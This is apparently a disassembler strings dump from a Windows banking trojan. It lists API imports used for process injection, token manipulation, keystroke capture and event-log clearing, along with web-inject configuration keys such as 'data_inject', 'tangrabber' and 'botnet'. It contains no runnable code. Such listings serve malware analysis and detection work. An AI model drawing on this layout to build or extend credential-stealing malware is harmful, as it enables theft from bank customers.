.text:0041D3AC 0000000C C RegEnumKeyA
.text:0041D3B8 00000010 C RegDeleteValueW
.text:0041D3C8 00000010 C RegDeleteValueA
.text:0041D3D8 0000000E C RegDeleteKeyW
.text:0041D3E8 0000000E C RegDeleteKeyA
.text:0041D3F8 0000000E C RegCreateKeyW
.text:0041D408 00000010 C RegCreateKeyExW
.text:0041D418 00000010 C RegCreateKeyExA
.text:0041D428 0000000E C RegCreateKeyA
.text:0041D438 00000014 C RegConnectRegistryW
.text:0041D44C 00000014 C RegConnectRegistryA
.text:0041D460 0000000C C RegCloseKey
.text:0041D46C 0000000E C ReadEventLogW
.text:0041D47C 0000000E C ReadEventLogA
.text:0041D48C 00000013 C QueryServiceStatus
.text:0041D4A0 0000001B C QueryServiceObjectSecurity
.text:0041D4BC 00000018 C QueryServiceLockStatusW
.text:0041D4D4 00000018 C QueryServiceLockStatusA
.text:0041D4EC 00000014 C QueryServiceConfigW
.text:0041D500 00000014 C QueryServiceConfigA
.text:0041D514 0000001D C PrivilegedServiceAuditAlarmW
.text:0041D534 0000001D C PrivilegedServiceAuditAlarmA
.text:0041D554 0000000F C PrivilegeCheck
.text:0041D564 00000010 C OpenThreadToken
.text:0041D574 0000000D C OpenServiceW
.text:0041D584 0000000D C OpenServiceA
.text:0041D594 0000000F C OpenSCManagerW
.text:0041D5A4 0000000F C OpenSCManagerA
.text:0041D5B4 00000011 C OpenProcessToken
.text:0041D5C8 0000000E C OpenEventLogW
.text:0041D5D8 0000000E C OpenEventLogA
.text:0041D5E8 00000014 C OpenBackupEventLogW
.text:0041D5FC 00000014 C OpenBackupEventLogA
.text:0041D610 0000001B C ObjectPrivilegeAuditAlarmW
.text:0041D62C 0000001B C ObjectPrivilegeAuditAlarmA
.text:0041D648 00000016 C ObjectOpenAuditAlarmW
.text:0041D660 00000016 C ObjectOpenAuditAlarmA
.text:0041D678 00000018 C ObjectDeleteAuditAlarmW
.text:0041D690 00000018 C ObjectDeleteAuditAlarmA
.text:0041D6A8 00000017 C ObjectCloseAuditAlarmW
.text:0041D6C0 00000017 C ObjectCloseAuditAlarmA
.text:0041D6D8 00000015 C NotifyChangeEventLog
.text:0041D6F0 00000017 C NotifyBootConfigStatus
.text:0040581C 0000000B C GetDlgItem
.text:00405828 0000000C C GetIconInfo
.text:00405834 00000009 C DrawIcon
.text:00405840 0000000D C GetCursorPos
.text:00405850 0000000C C LoadCursorW
.text:0040585C 00000011 C SetThreadDesktop
.text:00405870 0000000D C CloseDesktop
.text:00405880 0000000D C OpenDesktopA
.text:00405890 00000018 C SetProcessWindowStation
.text:004058A8 00000013 C CloseWindowStation
.text:004058BC 00000013 C OpenWindowStationA
.text:004058D0 00000014 C GetForegroundWindow
.text:004058E4 00000019 C GetWindowThreadProcessId
.text:00405900 00000011 C DispatchMessageW
.text:00405914 0000001A C MsgWaitForMultipleObjects
.text:00405930 00000011 C GetKeyboardState
.text:00405944 0000000A C ToUnicode
.text:00405950 0000000C C GetKeyState
.text:0040595C 00000011 C DispatchMessageA
.text:00405970 0000000D C PeekMessageW
.text:00405980 0000000F C CharLowerBuffA
.text:00405990 0000000E C ExitWindowsEx
.text:004059A0 0000000B C CharToOemW
.text:004059AC 0000000B C CharUpperW
.text:004059B8 00000010 C WSAGetLastError
.text:004059C8 00000010 C WSASetLastError
.text:004059D8 00000007 C select
.text:004059E0 00000009 C WSAIoctl
.text:004059EC 00000005 C recv
.text:004059F4 00000009 C recvfrom
.text:00405A00 0000000C C getsockname
.text:00405A0C 0000000D C freeaddrinfo
.text:00405A1C 0000000C C getaddrinfo
.text:00405A28 00000009 C shutdown
.text:00405A34 0000000B C WSACleanup
.text:00405A40 0000000B C WSAStartup
.text:00405A4C 00000007 C accept
.text:00405A54 00000007 C listen
.text:00405A5C 00000005 C bind
.text:00405A64 00000007 C socket
.text:00405A6C 0000000C C getpeername
.text:00405A78 00000007 C sendto
.text:00405A80 0000000A C WSASendTo
.text:00405A8C 00000008 C WSASend
.text:00405A94 00000014 C CryptReleaseContext
.text:00405AA8 00000011 C CryptDestroyHash
.text:00405ABC 00000012 C CryptGetHashParam
.text:00405AD0 0000000E C CryptHashData
.text:00405AE0 00000010 C CryptCreateHash
.text:00405AF0 00000015 C CryptAcquireContextW
.text:00405B08 00000011 C DuplicateTokenEx
.text:00405B1C 00000015 C CreateProcessAsUserW
.text:00405B34 0000001A C SetSecurityDescriptorDacl
.text:00405B50 0000001D C InitializeSecurityDescriptor
.text:00405B70 0000000E C RegEnumKeyExW
.text:00405B80 00000010 C RegDeleteValueW
.text:00405B90 0000000F C RegSetValueExA
.text:00405BA0 0000000F C RegSetValueExW
.text:00405BB0 0000000C C RegCloseKey
.text:00405BBC 0000000E C RegOpenKeyExW
.text:00405BCC 00000010 C RegCreateKeyExA
.text:00405BDC 00000010 C RegCreateKeyExW
.text:00405BEC 00000011 C RegQueryValueExW
.text:00405C00 00000012 C LookupAccountSidW
.text:00405C14 00000014 C GetTokenInformation
.text:00405C28 00000011 C OpenProcessToken
.text:00405C3C 00000016 C AdjustTokenPrivileges
.text:00405C54 00000016 C LookupPrivilegeValueW
.text:00405C6C 0000000D C GetUserNameW
.text:00405C7C 00000015 C DeleteUrlCacheEntryW
.text:0041D708 0000000F C MapGenericMask
.text:0041D718 00000013 C MakeSelfRelativeSD
.text:0041D72C 0000000F C MakeAbsoluteSD
.text:0041D73C 0000001F C LookupSecurityDescriptorPartsW
.text:0041D75C 0000001F C LookupSecurityDescriptorPartsA
.text:0041D77C 00000016 C LookupPrivilegeValueW
.text:0041D794 00000016 C LookupPrivilegeValueA
.text:0041D7AC 00000015 C LookupPrivilegeNameW
.text:0041D7C4 00000015 C LookupPrivilegeNameA
.text:0041D7DC 0000001C C LookupPrivilegeDisplayNameW
.text:0041D7F8 0000001C C LookupPrivilegeDisplayNameA
.text:0041D814 00000012 C LookupAccountSidW
.text:0041D828 00000012 C LookupAccountSidA
.text:0041D83C 00000013 C LookupAccountNameW
.text:0041D850 00000013 C LookupAccountNameA
.text:0041D864 0000000B C LogonUserW
.text:0041D870 0000000B C LogonUserA
.text:0041D87C 00000014 C LockServiceDatabase
.text:0041D890 0000000B C IsValidSid
.text:0041D89C 0000001A C IsValidSecurityDescriptor
.text:0041D8B8 0000000B C IsValidAcl
.text:0041D8C4 0000000E C IsTextUnicode
.text:0041D8D4 00000018 C InitiateSystemShutdownW
.text:0041D8EC 00000018 C InitiateSystemShutdownA
.text:0041D904 0000000E C InitializeSid
.text:0041D914 0000001D C InitializeSecurityDescriptor
.text:0041D934 0000000E C InitializeAcl
.text:0041D944 00000010 C ImpersonateSelf
.text:0041D954 0000001B C ImpersonateNamedPipeClient
.text:0041D970 00000018 C ImpersonateLoggedOnUser
.text:0041D988 0000000D C GetUserNameW
.text:0041D998 0000000D C GetUserNameA
.text:0041D9A8 00000010 C GetTrusteeTypeW
.text:0041D9B8 00000010 C GetTrusteeTypeA
.text:0041D9C8 00000010 C GetTrusteeNameW
.text:0041D9D8 00000010 C GetTrusteeNameA
.text:0041D9E8 00000014 C GetTokenInformation
.text:0041D9FC 00000018 C GetSidSubAuthorityCount
.text:0041DA14 00000013 C GetSidSubAuthority
.text:0041DA28 00000015 C GetSidLengthRequired
.text:0041DA40 0000001A C GetSidIdentifierAuthority
.text:0041DA5C 00000013 C GetServiceKeyNameW
.text:0041DA70 00000013 C GetServiceKeyNameA
.text:0041DA84 00000017 C GetServiceDisplayNameW
.text:0041DA9C 00000017 C GetServiceDisplayNameA
.text:0041DAB4 00000013 C GetSecurityInfoExW
.text:0041DAC8 00000013 C GetSecurityInfoExA
.text:0041DADC 00000010 C GetSecurityInfo
.text:0041DAEC 0000001A C GetSecurityDescriptorSacl
.text:0041DB08 0000001B C GetSecurityDescriptorOwner
.text:0041DB24 0000001C C GetSecurityDescriptorLength
.text:0041DB40 0000001B C GetSecurityDescriptorGroup
.text:0041DB5C 0000001A C GetSecurityDescriptorDacl
.text:0041DB78 0000001D C GetSecurityDescriptorControl
.text:0041DB98 00000019 C GetPrivateObjectSecurity
.text:0041DBB4 0000001B C GetOverlappedAccessResults
.text:0041DBD0 00000018 C GetOldestEventLogRecord
.text:0041DBE8 0000001B C GetNumberOfEventLogRecords
.text:0041DC04 00000016 C GetNamedSecurityInfoW
.text:0041DC1C 00000018 C GetNamedSecurityInfoExW
.text:0041DC34 00000018 C GetNamedSecurityInfoExA
.text:0041DC4C 00000016 C GetNamedSecurityInfoA
.text:0041DC64 00000014 C GetMultipleTrusteeW
.text:0041DC78 0000001D C GetMultipleTrusteeOperationW
.text:0041DC98 0000001D C GetMultipleTrusteeOperationA
.text:0041DCB8 00000014 C GetMultipleTrusteeA
.text:0041DCCC 0000000D C GetLengthSid
.text:0041DCDC 00000018 C GetKernelObjectSecurity
.text:0041DCF4 00000011 C GetFileSecurityW
.text:0041DD08 00000011 C GetFileSecurityA
.text:00405C94 00000012 C FindCloseUrlCache
.text:00405CA8 00000017 C FindNextUrlCacheEntryW
.text:00405CC0 00000018 C FindFirstUrlCacheEntryW
.text:00405CD8 00000013 C InternetSetOptionA
.text:00405CEC 0000001A C InternetSetStatusCallback
.text:00405D08 00000016 C GetUrlCacheEntryInfoW
.text:00405D20 00000017 C HttpAddRequestHeadersA
.text:00405D38 00000017 C HttpAddRequestHeadersW
.text:00405D50 00000015 C InternetQueryOptionA
.text:00405D68 00000019 C InternetCheckConnectionA
.text:00405D84 00000012 C InternetCrackUrlA
.text:00405D98 00000011 C HttpOpenRequestA
.text:00405DAC 00000011 C InternetConnectA
.text:00405DC0 00000011 C InternetOpenUrlA
.text:00405DD4 0000000E C InternetOpenA
.text:00405DE4 00000013 C InternetGetCookieA
.text:00405DF8 00000015 C GetModuleFileNameExW
.text:00405E10 0000000D C SHDeleteKeyA
.text:00405E20 0000000F C PathMatchSpecW
.text:00405E30 00000014 C PathRemoveFileSpecW
.text:00405E44 00000010 C PathFileExistsW
.text:00405E54 0000000E C PathSkipRootW
.text:00405E64 00000015 C PathRemoveBackslashW
.text:00405E7C 00000012 C PathAddExtensionW
.text:00405E90 00000012 C PathAddBackslashW
.text:00405EA4 00000012 C PathFindFileNameW
.text:00405EB8 0000000D C PathCombineW
.text:00405EC8 0000000B C wnsprintfA
.text:00405ED4 0000000B C wnsprintfW
.text:00405EE0 0000000C C wvnsprintfA
.text:00405EEC 0000000C C wvnsprintfW
.text:00405EF8 0000000A C StrCmpNIW
.text:00405F04 0000000A C StrCmpNIA
.text:00405F10 00000009 C StrStrIA
.text:00405F1C 00000008 C StrStrW
.text:00405F24 00000014 C RtlCreateUserThread
.text:00405F38 00000010 C LdrGetDllHandle
.text:00405F48 0000001A C NtQueryInformationProcess
.text:00405F64 0000000D C NtCreateFile
.text:00405F74 0000000E C NtQueryObject
.text:00405F84 0000000E C ShellExecuteW
.text:00405F94 00000011 C SHGetFolderPathW
.text:00405FA8 00000018 C SHGetSpecialFolderPathW
.text:00405FC0 0000000E C FindResourceW
.text:00405FD0 0000001A C ExpandEnvironmentStringsW
.text:00405FEC 0000000D C GlobalUnlock
.text:00405FFC 0000000B C GlobalLock
.text:00406008 0000000C C GetFileTime
.text:00406014 0000000C C SetFileTime
.text:00406020 00000011 C GetComputerNameW
.text:00406034 0000000A C FindClose
.text:00406040 0000000E C FindNextFileW
.text:00406050 0000000F C FindFirstFileW
.text:00406060 00000011 C GetTempFileNameW
.text:00406074 00000015 C SystemTimeToFileTime
.text:0040608C 0000000E C GetSystemTime
.text:0040609C 00000015 C LeaveCriticalSection
.text:004060B4 00000015 C EnterCriticalSection
.text:004060CC 0000001A C InitializeCriticalSection
.text:004060E8 00000012 C ReadProcessMemory
.text:004060FC 0000000D C SetLastError
.text:0040610C 0000000E C IsBadWritePtr
.text:0040611C 0000000D C IsBadReadPtr
.text:0040612C 0000000D C GetTempPathW
.text:0040613C 00000011 C CreateDirectoryW
.text:00406150 0000000C C MoveFileExW
.text:0040615C 00000014 C WideCharToMultiByte
.text:00406170 00000014 C MultiByteToWideChar
.text:00406184 00000010 C GetProcessTimes
.text:00406194 0000000F C CreateProcessW
.text:0041DD1C 0000001B C GetExplicitEntriesFromAclW
.text:0041DD38 0000001B C GetExplicitEntriesFromAclA
.text:0041DD54 0000001B C GetEffectiveRightsFromAclW
.text:0041DD70 0000001B C GetEffectiveRightsFromAclA
.text:0041DD8C 00000015 C GetCurrentHwProfileW
.text:0041DDA4 00000015 C GetCurrentHwProfileA
.text:0041DDBC 0000001E C GetAuditedPermissionsFromAclW
.text:0041DDDC 0000001E C GetAuditedPermissionsFromAclA
.text:0041DDFC 00000012 C GetAclInformation
.text:0041DE10 00000007 C GetAce
.text:0041DE18 0000001F C GetAccessPermissionsForObjectW
.text:0041DE38 0000001F C GetAccessPermissionsForObjectA
.text:0041DE58 00000008 C FreeSid
.text:0041DE60 00000011 C FindFirstFreeAce
.text:0041DE74 00000009 C EqualSid
.text:0041DE80 0000000F C EqualPrefixSid
.text:0041DE90 00000014 C EnumServicesStatusW
.text:0041DEA4 00000014 C EnumServicesStatusA
.text:0041DEB8 00000017 C EnumDependentServicesW
.text:0041DED0 00000017 C EnumDependentServicesA
.text:0041DEE8 00000011 C DuplicateTokenEx
.text:0041DEFC 0000000F C DuplicateToken
.text:0041DF0C 0000001D C DestroyPrivateObjectSecurity
.text:0041DF2C 00000016 C DeregisterEventSource
.text:0041DF44 0000000E C DeleteService
.text:0041DF54 0000000A C DeleteAce
.text:0041DF60 00000016 C CryptVerifySignatureW
.text:0041DF78 00000016 C CryptVerifySignatureA
.text:0041DF90 0000000F C CryptSignHashW
.text:0041DFA0 0000000F C CryptSignHashA
.text:0041DFB0 00000012 C CryptSetProviderW
.text:0041DFC4 00000014 C CryptSetProviderExW
.text:0041DFD8 00000014 C CryptSetProviderExA
.text:0041DFEC 00000012 C CryptSetProviderA
.text:0041E000 00000012 C CryptSetProvParam
.text:0041E014 00000011 C CryptSetKeyParam
.text:0041E028 00000012 C CryptSetHashParam
.text:0041E03C 00000014 C CryptReleaseContext
.text:0041E050 0000000F C CryptImportKey
.text:0041E060 00000014 C CryptHashSessionKey
.text:0041E074 0000000E C CryptHashData
.text:0041E084 00000010 C CryptGetUserKey
.text:0041E094 00000012 C CryptGetProvParam
.text:0041E0A8 00000011 C CryptGetKeyParam
.text:0041E0BC 00000012 C CryptGetHashParam
.text:0041E0D0 00000019 C CryptGetDefaultProviderW
.text:0041E0EC 00000019 C CryptGetDefaultProviderA
.text:0041E108 0000000F C CryptGenRandom
.text:0041E118 0000000C C CryptGenKey
.text:0041E124 0000000F C CryptExportKey
.text:0041E134 00000014 C CryptEnumProvidersW
.text:0041E148 00000014 C CryptEnumProvidersA
.text:0041E15C 00000018 C CryptEnumProviderTypesW
.text:0041E174 00000018 C CryptEnumProviderTypesA
.text:0041E18C 0000000D C CryptEncrypt
.text:0041E19C 00000012 C CryptDuplicateKey
.text:0041E1B0 00000013 C CryptDuplicateHash
.text:0041E1C4 00000010 C CryptDestroyKey
.text:0041E1D4 00000011 C CryptDestroyHash
.text:0041E1E8 0000000F C CryptDeriveKey
.text:0041E1F8 0000000D C CryptDecrypt
.text:0041E208 00000010 C CryptCreateHash
.text:0041E218 00000013 C CryptContextAddRef
.text:0041E22C 00000015 C CryptAcquireContextW
.text:0041E244 00000015 C CryptAcquireContextA
.text:0041E25C 0000000F C CreateServiceW
.text:0041E26C 0000000F C CreateServiceA
.text:0041E27C 00000015 C CreateProcessAsUserW
.text:0041E294 00000015 C CreateProcessAsUserA
.text:0041E2AC 0000001C C CreatePrivateObjectSecurity
.text:004061A4 00000013 C GetCurrentThreadId
.text:004061B8 00000011 C GetCurrentThread
.text:004061CC 00000012 C GetThreadPriority
.text:004061E0 00000012 C SetThreadPriority
.text:004061F4 00000014 C GetCurrentProcessId
.text:00406208 0000000E C VirtualFreeEx
.text:00406218 00000011 C VirtualProtectEx
.text:0040622C 0000000F C VirtualAllocEx
.text:0040623C 0000000F C VirtualQueryEx
.text:0040624C 0000000C C OpenProcess
.text:00406258 0000000C C ExitProcess
.text:00406264 0000000B C ExitThread
.text:00406270 00000013 C GetExitCodeProcess
.text:00406284 0000000D C Thread32Next
.text:00406294 0000000E C Thread32First
.text:004062A4 0000000E C Module32NextW
.text:004062B4 0000000F C Module32FirstW
.text:004062C4 0000000F C Process32NextW
.text:004062D4 00000010 C Process32FirstW
.text:004062E4 00000019 C CreateToolhelp32Snapshot
.text:00406300 00000013 C CreateRemoteThread
.text:00406314 0000000D C CreateThread
.text:00406324 00000013 C WriteProcessMemory
.text:00406338 00000014 C DisconnectNamedPipe
.text:0040634C 0000000D C GetLocalTime
.text:0040635C 00000011 C FlushFileBuffers
.text:00406370 0000000C C GetFileSize
.text:0040637C 0000000D C SetEndOfFile
.text:0040638C 00000009 C ReadFile
.text:00406398 0000000A C WriteFile
.text:004063A4 0000000D C GetTickCount
.text:004063B4 00000011 C CreateNamedPipeW
.text:004063C8 00000018 C SetNamedPipeHandleState
.text:004063E0 0000000F C WaitNamedPipeW
.text:004063F0 00000011 C ConnectNamedPipe
.text:00406404 00000009 C HeapFree
.text:00406410 0000000C C HeapReAlloc
.text:0040641C 0000000A C HeapAlloc
.text:00406428 0000000C C HeapDestroy
.text:00406434 0000000B C HeapCreate
.text:00406440 0000000F C SetFilePointer
.text:00406450 0000000D C CreateEventW
.text:00406460 0000000C C CreateFileW
.text:0040646C 00000009 C SetEvent
.text:00406478 00000014 C WaitForSingleObject
.text:0040648C 00000013 C SetFileAttributesW
.text:004064A0 0000000C C DeleteFileW
.text:004064AC 0000000C C CloseHandle
.text:004064B8 00000009 C lstrcatA
.text:004064C4 00000009 C lstrcatW
.text:004064D0 00000009 C lstrcpyA
.text:004064DC 0000000A C lstrcpynA
.text:004064E8 0000000A C lstrcpynW
.text:004064F4 00000009 C lstrcpyW
.text:00406500 0000000A C lstrcmpiA
.text:0040650C 0000000A C lstrcmpiW
.text:00406518 0000000D C ReleaseMutex
.text:00406528 0000000B C OpenMutexW
.text:00406534 0000000D C CreateMutexW
.text:00406544 0000000D C GetLastError
.text:00406554 00000011 C SetFilePointerEx
.text:00406568 00000013 C GetModuleFileNameA
.text:0040657C 00000013 C GetModuleFileNameW
.text:00406590 0000000A C CopyFileW
.text:0040659C 00000006 C Sleep
.text:004065A4 00000011 C GetModuleHandleA
.text:004065B8 00000019 C GetUserDefaultUILanguage
.text:004065D4 0000000E C GetVersionExW
.text:004065E4 00000017 C GetTimeZoneInformation
.text:004065FC 0000000B C ResetEvent
.text:0041E2C8 00000008 C CopySid
.text:0041E2D0 00000023 C ConvertSecurityDescriptorToAccessW
.text:0041E2F4 00000028 C ConvertSecurityDescriptorToAccessNamedW
.text:0041E31C 00000028 C ConvertSecurityDescriptorToAccessNamedA
.text:0041E344 00000023 C ConvertSecurityDescriptorToAccessA
.text:0041E368 00000023 C ConvertAccessToSecurityDescriptorW
.text:0041E38C 00000023 C ConvertAccessToSecurityDescriptorA
.text:0041E3B0 0000000F C ControlService
.text:0041E3C0 00000013 C CloseServiceHandle
.text:0041E3D4 0000000E C CloseEventLog
.text:0041E3E4 0000000F C ClearEventLogW
.text:0041E3F4 0000000F C ClearEventLogA
.text:0041E404 00000015 C ChangeServiceConfigW
.text:0041E41C 00000015 C ChangeServiceConfigA
.text:0041E434 00000017 C CancelOverlappedAccess
.text:0041E44C 00000015 C BuildTrusteeWithSidW
.text:0041E464 00000015 C BuildTrusteeWithSidA
.text:0041E47C 00000016 C BuildTrusteeWithNameW
.text:0041E494 00000016 C BuildTrusteeWithNameA
.text:0041E4AC 00000019 C BuildSecurityDescriptorW
.text:0041E4C8 00000019 C BuildSecurityDescriptorA
.text:0041E4E4 00000019 C BuildImpersonateTrusteeW
.text:0041E500 00000019 C BuildImpersonateTrusteeA
.text:0041E51C 00000028 C BuildImpersonateExplicitAccessWithNameW
.text:0041E544 00000028 C BuildImpersonateExplicitAccessWithNameA
.text:0041E56C 0000001D C BuildExplicitAccessWithNameW
.text:0041E58C 0000001D C BuildExplicitAccessWithNameA
.text:0041E5AC 00000010 C BackupEventLogW
.text:0041E5BC 00000010 C BackupEventLogA
.text:0041E5CC 00000016 C AreAnyAccessesGranted
.text:0041E5E4 00000016 C AreAllAccessesGranted
.text:0041E5FC 00000018 C AllocateLocallyUniqueId
.text:0041E614 00000019 C AllocateAndInitializeSid
.text:0041E630 00000016 C AdjustTokenPrivileges
.text:0041E648 00000012 C AdjustTokenGroups
.text:0041E65C 00000012 C AddAuditAccessAce
.text:0041E670 00000007 C AddAce
.text:0041E678 00000013 C AddAccessDeniedAce
.text:0041E68C 00000014 C AddAccessAllowedAce
.text:0041E6A0 0000001A C AccessCheckAndAuditAlarmW
.text:0041E6BC 0000001A C AccessCheckAndAuditAlarmA
.text:0041E6D8 0000000C C AccessCheck
.text:0041E6E4 00000015 C AbortSystemShutdownW
.text:0041E6FC 00000015 C AbortSystemShutdownA
.text:0041E714 0000000C C wvnsprintfW
.text:0041E720 0000000C C wvnsprintfA
.text:0041E72C 0000000B C wnsprintfW
.text:0041E738 0000000B C wnsprintfA
.text:0041E744 0000000D C UrlUnescapeW
.text:0041E754 0000000D C UrlUnescapeA
.text:0041E764 00000007 C UrlIsW
.text:0041E76C 0000000D C UrlIsOpaqueW
.text:0041E77C 0000000D C UrlIsOpaqueA
.text:0041E78C 00000010 C UrlIsNoHistoryW
.text:0041E79C 00000010 C UrlIsNoHistoryA
.text:0041E7AC 00000007 C UrlIsA
.text:0041E7B4 00000009 C UrlHashW
.text:0041E7C0 00000009 C UrlHashA
.text:0041E7CC 0000000C C UrlGetPartW
.text:0041E7D8 0000000C C UrlGetPartA
.text:0041E7E4 00000010 C UrlGetLocationW
.text:0041E7F4 00000010 C UrlGetLocationA
.text:0041E804 0000000B C UrlEscapeW
.text:0041E810 0000000B C UrlEscapeA
.text:0041E81C 00000013 C UrlCreateFromPathW
.text:0041E830 00000013 C UrlCreateFromPathA
.text:0041E844 0000000C C UrlCompareW
.text:0041E850 0000000C C UrlCompareA
.text:0041E85C 0000000C C UrlCombineW
.text:0041E868 0000000C C UrlCombineA
.text:00406608 00000010 C UnmapViewOfFile
.text:00406618 0000000E C MapViewOfFile
.text:00406628 00000013 C CreateFileMappingW
.text:0040663C 0000000E C GetFileSizeEx
.text:0040664C 0000000E C GetDriveTypeW
.text:0040665C 00000011 C GetLogicalDrives
.text:00406670 00000010 C GetCommandLineA
.text:00406680 0000000F C GetProcessHeap
.text:00406690 00000013 C GetFileAttributesW
.text:004066A4 0000000D C GetProcessId
.text:004066B4 0000000E C SuspendThread
.text:004066C4 0000000C C FreeLibrary
.text:004066D0 0000000B C OpenThread
.text:004066DC 0000000D C ResumeThread
.text:004066F8 00000005 C text
.text:00406700 00000011 C GetThreadContext
.text:00406714 00000016 C CreateTimerQueueTimer
.text:0040672C 00000016 C FileTimeToDosDateTime
.text:00406744 00000018 C FileTimeToLocalFileTime
.text:0040675C 0000001B C GetFileInformationByHandle
.text:00406778 00000017 C WaitForMultipleObjects
.text:00406790 00000022 C GetVolumeNameForVolumeMountPointW
.text:004067B4 00000014 C GetOverlappedResult
.text:004067C8 00000018 C GetEnvironmentVariableW
.text:004067E0 0000000A C LocalFree
.text:004067EC 0000000F C FormatMessageW
.text:00406FF8 00000012 C WTSQueryUserToken
.text:0040700C 0000000C C userenv.dll
.text:00407018 00000017 C CreateEnvironmentBlock
.text:00407030 00000018 C DestroyEnvironmentBlock
.text:00407070 00000011 C (kd;l;;;;;324j((
.text:004070BC 00000014 C DllUnregisterServer
.text:004070D0 00000012 C DllRegisterServer
.text:004070E4 00000012 C DllGetClassObject
.text:004070F8 00000010 C DllCanUnloadNow
.text:004072DC 0000000A C *<select
.text:004072E8 00000013 C *<option selected
.text:004072FC 00000011 C *<input *value=\"
.text:00407334 00000007 C %%0%uu
.text:004073AC 00000005 C pop3
.text:0040743C 00000038 C Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
.text:00407474 00000009 C HTTP/1.1
.text:00407480 0000000B C urlmon.dll
.text:0040748C 00000016 C ObtainUserAgentString
.text:004074B8 0000000C C cabinet.dll
.text:004074C4 0000000A C FCICreate
.text:004074D0 0000000B C FCIAddFile
.text:004074DC 00000010 C FCIFlushCabinet
.text:004074EC 0000000B C FCIDestroy
.text:00418920 0000000D C staticconfig
.text:00418998 00000007 C botnet
.text:004189E0 0000000D C timer_config
.text:00418A20 0000000B C timer_logs
.text:00418A58 0000000C C timer_stats
.text:00418A94 0000000B C url_config
.text:00418AF8 0000000B C url_compip
.text:00418B5C 0000000F C encryption_key
.text:00418BD8 00000014 C blacklist_languages
.text:00418C4C 00000007 C .data1
.text:00418C54 00000013 C percent_of_overlay
.text:00418C68 0000000E C dynamicconfig
.text:00418C78 0000000B C url_loader
.text:00418CF4 00000008 C set_url
.text:00418CFC 0000000E C data_before\r\n
.text:00418D0C 0000000E C data_inject\r\n
.text:00418D1C 0000000D C data_after\r\n
.text:00418D2C 0000000B C data_end\r\n
.text:00418E9C 0000000B C url_server
.text:00418F3C 0000000F C advancedconfig
.text:0041E874 00000011 C UrlCanonicalizeW
.text:0041E888 00000011 C UrlCanonicalizeA
.text:0041E89C 00000010 C UrlApplySchemeW
.text:0041E8AC 00000010 C UrlApplySchemeA
.text:0041E8BC 00000009 C StrTrimW
.text:0041E8C8 00000009 C StrTrimA
.text:0041E8D4 0000000A C StrToIntW
.text:0041E8E0 0000000C C StrToIntExW
.text:0041E8EC 0000000C C StrToIntExA
.text:0041E8F8 0000000A C StrToIntA
.text:0041E904 00000008 C StrStrW
.text:0041E90C 00000009 C StrStrIW
.text:0041E918 00000009 C StrStrIA
.text:0041E924 00000008 C StrStrA
.text:0041E92C 00000008 C StrSpnW
.text:0041E934 00000008 C StrSpnA
.text:0041E93C 0000000D C StrRetToStrW
.text:0041E94C 0000000D C StrRetToStrA
.text:0041E95C 0000000D C StrRetToBufW
.text:0041E96C 0000000D C StrRetToBufA
.text:0041E97C 0000000A C StrRStrIW
.text:0041E988 0000000A C StrRStrIA
.text:0041E994 00000009 C StrRChrW
.text:0041E9A0 0000000A C StrRChrIW
.text:0041E9AC 0000000A C StrRChrIA
.text:0041E9B8 00000009 C StrRChrA
.text:0041E9C4 00000009 C StrPBrkW
.text:0041E9D0 00000009 C StrPBrkA
.text:0041E9DC 00000009 C StrNCatW
.text:0041E9E8 00000009 C StrNCatA
.text:0041E9F4 00000010 C StrIsIntlEqualW
.text:0041EA04 00000010 C StrIsIntlEqualA
.text:0041EA14 00000015 C StrFromTimeIntervalW
.text:0041EA2C 00000015 C StrFromTimeIntervalA
.text:0041EA44 00000011 C StrFormatKBSizeW
.text:0041EA58 00000011 C StrFormatKBSizeA
.text:0041EA6C 00000013 C StrFormatByteSizeW
.text:0041EA80 00000013 C StrFormatByteSizeA
.text:0041EA94 00000015 C StrFormatByteSize64A
.text:0041EAAC 00000008 C StrDupW
.text:0041EAB4 00000008 C StrDupA
.text:0041EABC 00000008 C StrCpyW
.text:0041EAC4 00000009 C StrCpyNW
.text:0041EAD0 00000008 C StrCmpW
.text:0041EAD8 00000009 C StrCmpNW
.text:0041EAE4 0000000A C StrCmpNIW
.text:0041EAF0 0000000A C StrCmpNIA
.text:0041EAFC 00000009 C StrCmpNA
.text:0041EB08 00000009 C StrCmpIW
.text:0041EB14 00000008 C StrChrW
.text:0041EB1C 00000009 C StrChrIW
.text:0041EB28 00000009 C StrChrIA
.text:0041EB34 00000008 C StrChrA
.text:0041EB3C 00000008 C StrCatW
.text:0041EB44 0000000C C StrCatBuffW
.text:0041EB50 0000000C C StrCatBuffA
.text:0041EB5C 00000009 C StrCSpnW
.text:0041EB68 0000000A C StrCSpnIW
.text:0041EB74 0000000A C StrCSpnIA
.text:0041EB80 00000009 C StrCSpnA
.text:0041EB8C 0000000A C SHStrDupW
.text:0041EB98 0000000A C SHStrDupA
.text:0041EBA4 0000000F C SHSkipJunction
.text:0041EBB4 0000000C C SHSetValueW
.text:0041EBC0 0000000C C SHSetValueA
.text:0041EBCC 0000000F C SHSetThreadRef
.text:0041EBDC 00000013 C SHRegWriteUSValueW
.text:0041EBF0 00000013 C SHRegWriteUSValueA
.text:0041EC04 00000011 C SHRegSetUSValueW
.text:0041EC18 00000011 C SHRegSetUSValueA
.text:00418F4C 00000010 C advancedconfigs
.text:00418F8C 0000000A C webfilter
.text:00418F98 0000000B C webfilters
.text:00418FE0 0000000E C webdatafilter
.text:00418FF0 0000000F C webdatafilters
.text:00419000 00000009 C webfakes
.text:00419064 0000000B C tangrabber
.text:00419100 00000007 C dnsmap
.text:00419108 00000010 C file_webinjects
.text:00419584 00000005 C lexx
.text:00419644 0000000A C ole32.dll
.text:00419650 0000000C C SHLWAPI.dll
.text:0041965C 0000000D C ADVAPI32.dll
.text:0041966C 0000000B C USER32.dll
.text:00419678 0000000D C KERNEL32.dll
.text:00419688 00000012 C WriteStringStream
.text:0041969C 0000000C C WriteOleStg
.text:004196A8 00000014 C WriteFmtUserTypeStg
.text:004196BC 0000000E C WriteClassStm
.text:004196CC 0000000E C WriteClassStg
.text:004196DC 00000010 C UtGetDvtd32Info
.text:004196EC 00000010 C UtGetDvtd16Info
.text:004196FC 00000018 C UtConvertDvtd32toDvtd16
.text:00419714 00000018 C UtConvertDvtd16toDvtd32
.text:0041972C 00000013 C UpdateDCOMSettings
.text:00419740 0000000E C StringFromIID
.text:00419750 00000010 C StringFromGUID2
.text:00419760 00000010 C StringFromCLSID
.text:00419770 0000000C C StgSetTimes
.text:0041977C 0000001B C StgOpenStorageOnILockBytes
.text:00419798 00000011 C StgOpenStorageEx
.text:004197AC 0000000F C StgOpenStorage
